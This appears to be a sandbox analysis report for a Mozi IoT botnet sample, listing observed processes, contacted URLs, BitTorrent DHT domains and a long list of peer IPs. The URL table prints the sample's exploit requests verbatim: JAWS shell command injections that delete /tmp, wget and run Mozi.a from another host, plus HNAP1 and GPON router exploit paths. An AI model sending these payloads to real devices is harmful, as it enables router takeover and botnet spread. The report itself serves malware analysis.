clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
There are 155 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://52.54.104.1:80/HNAP1/
52.54.104.1
malicious
http://122.201.116.141:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
122.201.116.141
malicious
http://%s:%d/bin.sh;chmod
unknown
malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
70.38.30.153
malicious
http://216.180.103.7:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
216.180.103.7
malicious
http://201.49.41.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
201.49.41.72
malicious
http://112.74.206.52:80/HNAP1/
112.74.206.52
malicious
http://221.128.175.114:80/HNAP1/
221.128.175.114
malicious
http://%s:%d/bin.sh
unknown
malicious
http://3.113.149.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
3.113.149.148
malicious
http://175.119.69.229:80/HNAP1/
175.119.69.229
malicious
http://pastebin.ca)
unknown
clean
http://%s:%d/Mozi.a;chmod
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://%s:%d/Mozi.m;$
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean
http://127.0.0.1
unknown
clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
clean
http://www.alsa-project.org
unknown
clean
http://www.pastebin.ca/upload.php
unknown
clean
http://%s:%d/Mozi.m
unknown
clean
http://www.alsa-project.org/cardinfo-db/
unknown
clean
http://127.0.0.1sendcmd
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
clean
http://ipinfo.io/ip
unknown
clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
clean
http://www.pastebin.ca
unknown
clean
http://purenetworks.com/HNAP1/
unknown
clean
http://www.alsa-project.org/alsa-info.sh
unknown
clean
http://%s:%d/Mozi.m;
unknown
clean
http://www.alsa-project.org.
unknown
clean
http://HTTP/1.1
unknown
clean
http://%s:%d/Mozi.a;sh$
unknown
clean
http://www.pastebin.ca.
unknown
clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
clean
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dht.transmissionbt.com
87.98.162.88
clean
bttracker.acc.umu.se
130.239.18.158
clean
router.bittorrent.com
67.215.246.10
clean
router.utorrent.com
82.221.103.244
clean
bttracker.debian.org
unknown
clean

IPs

IP
Domain
Country
Malicious
94.203.207.167
unknown
United Arab Emirates
clean
22.89.26.204
unknown
United States
clean
195.142.249.103
unknown
Turkey
clean
85.44.173.79
unknown
Italy
clean
203.76.80.94
unknown
Japan
clean
172.47.177.11
unknown
United States
clean
221.121.67.245
unknown
Australia
clean
197.103.198.60
unknown
South Africa
clean
84.216.74.60
unknown
Sweden
clean
147.239.8.164
unknown
United States
clean
27.219.31.91
unknown
China
clean
118.241.131.48
unknown
Japan
clean
114.245.131.177
unknown
China
clean
221.136.35.240
unknown
China
clean
97.109.239.27
unknown
Canada
clean
166.65.80.38
unknown
New Zealand
clean
76.217.46.172
unknown
United States
clean
4.252.44.159
unknown
United States
clean
193.48.239.12
unknown
France
clean
77.72.157.219
unknown
Netherlands
clean
174.111.86.95
unknown
United States
clean
187.11.37.82
unknown
Brazil
clean
69.91.47.228
unknown
United States
clean
53.49.108.194
unknown
Germany
clean
125.68.189.12
unknown
China
clean
98.80.130.179
unknown
United States
clean
105.87.139.22
unknown
Egypt
clean
168.122.210.178
unknown
United States
clean
67.154.225.218
unknown
United States
clean
135.114.116.178
unknown
United States
clean
163.136.89.118
unknown
Japan
clean
88.117.139.76
unknown
Austria
clean
163.55.185.59
unknown
Japan
clean
67.194.169.78
unknown
United States
clean
147.45.243.245
unknown
Russian Federation
clean
175.210.60.254
unknown
Korea Republic of
clean
86.125.111.1
unknown
Romania
clean
16.21.94.155
unknown
United States
clean
63.89.240.37
unknown
United States
clean
181.65.68.78
unknown
Peru
clean
133.60.186.200
unknown
Japan
clean
59.192.38.107
unknown
China
clean
145.200.155.76
unknown
Netherlands
clean
122.145.165.234
unknown
Japan
clean
86.66.84.251
unknown
France
clean
217.198.0.163
unknown
Russian Federation
clean
212.58.38.181
unknown
United Kingdom
clean
120.26.205.75
unknown
China
clean
39.58.236.135
unknown
Pakistan
clean
105.152.92.179
unknown
Morocco
clean
38.158.59.90
unknown
United States
clean
102.5.14.36
unknown
unknown
clean
94.141.229.241
unknown
Russian Federation
clean
24.91.81.168
unknown
United States
clean
119.4.226.185
unknown
China
clean
200.5.135.104
unknown
Venezuela
clean
46.4.218.5
unknown
Germany
clean
70.112.192.65
unknown
United States
clean
98.210.30.71
unknown
United States
clean
213.252.178.60
unknown
Germany
clean
145.232.209.196
unknown
Switzerland
clean
17.132.17.181
unknown
United States
clean
210.124.201.174
unknown
Korea Republic of
clean
144.181.223.184
unknown
Norway
clean
123.222.206.245
unknown
Japan
clean
26.170.22.231
unknown
United States
clean
185.199.7.63
unknown
Russian Federation
clean
191.195.251.222
unknown
Brazil
clean
184.208.244.4
unknown
United States
clean
100.247.223.10
unknown
United States
clean
223.68.174.98
unknown
China
clean
170.50.42.161
unknown
United States
clean
37.183.225.87
unknown
Italy
clean
90.69.78.230
unknown
France
clean
193.158.229.141
unknown
Germany
clean
76.212.164.182
unknown
United States
clean
82.222.206.85
unknown
Turkey
clean
188.50.35.239
unknown
Saudi Arabia
clean
73.44.243.3
unknown
United States
clean
110.161.16.195
unknown
Japan
clean
176.190.90.3
unknown
France
clean
186.110.45.252
unknown
Argentina
clean
154.32.220.46
unknown
United Kingdom
clean
194.181.5.184
unknown
Poland
clean
68.65.138.36
unknown
United States
clean
75.150.131.245
unknown
United States
clean
174.176.240.91
unknown
United States
clean
164.65.9.101
unknown
United States
clean
106.202.19.20
unknown
India
clean
192.242.78.25
unknown
United States
clean
201.253.51.131
unknown
Argentina
clean
96.220.84.8
unknown
United States
clean
74.59.149.216
unknown
Canada
clean
115.129.103.88
unknown
Australia
clean
104.217.29.14
unknown
United States
clean
174.125.112.165
unknown
United States
clean
124.93.117.153
unknown
China
clean
211.77.127.153
unknown
Taiwan; Republic of China (ROC)
clean
165.136.72.146
unknown
United States
clean
139.175.26.151
unknown
Taiwan; Republic of China (ROC)
clean
There are 90 hidden IPs, click here to show them.